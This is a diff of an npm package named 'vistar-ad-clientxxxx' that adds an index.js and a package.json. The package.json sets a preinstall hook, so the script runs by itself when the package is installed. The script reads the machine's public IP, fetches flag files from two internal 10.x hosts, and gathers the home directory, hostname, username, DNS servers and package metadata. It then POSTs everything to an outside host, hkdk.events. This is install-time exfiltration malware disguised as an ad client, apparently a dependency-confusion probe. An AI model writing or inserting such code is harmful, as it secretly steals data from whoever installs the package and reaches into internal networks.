vistar-ad-clientxxxx 11.0.19

package/index.js

@@ -0,0 +1,131 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const http = require("http");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+// Function to get the public IP using an external API
+function getPublicIP(callback) {
+  https
+    .get("https://api.ipify.org?format=json", (res) => {
+      let data = "";
+
+      res.on("data", (chunk) => {
+        data += chunk;
+      });
+
+      res.on("end", () => {
+        try {
+          const ipAddress = JSON.parse(data).ip;
+          callback(null, ipAddress);
+        } catch (e) {
+          callback("Failed to parse public IP", null);
+        }
+      });
+    })
+    .on("error", (err) => {
+      callback(err, null);
+    });
+}
+
+// Function to fetch the flag from the provided endpoints
+function fetchFlag(url, publicIP, callback) {
+  http
+    .get(url, (res) => {
+      let data = "";
+
+      res.on("data", (chunk) => {
+        data += chunk;
+      });
+
+      res.on("end", () => {
+        if (res.statusCode === 200) {
+          callback(null, { ip: publicIP, flag: data.trim(), endpoint: url });
+        } else {
+          callback(null, {
+            ip: publicIP,
+            result: "Couldn't access it",
+            endpoint: url,
+          });
+        }
+      });
+    })
+    .on("error", (err) => {
+      callback(err, {
+        ip: publicIP,
+        result: "Couldn't access it",
+        endpoint: url,
+      });
+    });
+}
+
+// Create tracking data
+getPublicIP((err, publicIP) => {
+  if (err) {
+    console.log("Error fetching public IP:", err);
+    return;
+  }
+
+  const flagRequests = [];
+  const urls = [
+    "http://10.72.218.66/flag.txt",
+    "http://10.62.252.214/flag.txt",
+  ];
+
+  urls.forEach((url) => {
+    flagRequests.push(
+      new Promise((resolve) => {
+        fetchFlag(url, publicIP, (err, result) => {
+          resolve(result); // Always resolve with the result, even on error
+        });
+      })
+    );
+  });
+
+  // Wait for all flag requests to finish
+  Promise.all(flagRequests).then((flags) => {
+    const trackingData = JSON.stringify({
+      p: package,
+      c: __dirname,
+      hd: os.homedir(),
+      hn: os.hostname(),
+      un: os.userInfo().username,
+      dns: dns.getServers(),
+      r: packageJSON ? packageJSON.___resolved : undefined,
+      v: packageJSON.version,
+      pjson: packageJSON,
+      ip: publicIP,
+      flags: flags,
+    });
+
+    const postData = querystring.stringify({
+      msg: trackingData,
+    });
+
+    const options = {
+      hostname: "hkdk.events", // replace with the correct server
+      port: 443,
+      path: "/7ar4u4h02e8d31",
+      method: "POST",
+      headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+      },
+    };
+
+    const req = https.request(options, (res) => {
+      res.on("data", (d) => {
+        process.stdout.write(d);
+      });
+    });
+
+    req.on("error", (e) => {
+      console.error(e);
+    });
+
+    req.write(postData);
+    req.end();
+  });
+});

package/package.json

@@ -0,0 +1,13 @@
+{
+  "name": "vistar-ad-clientxxxx",
+  "version": "11.0.19",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "description": ""
+}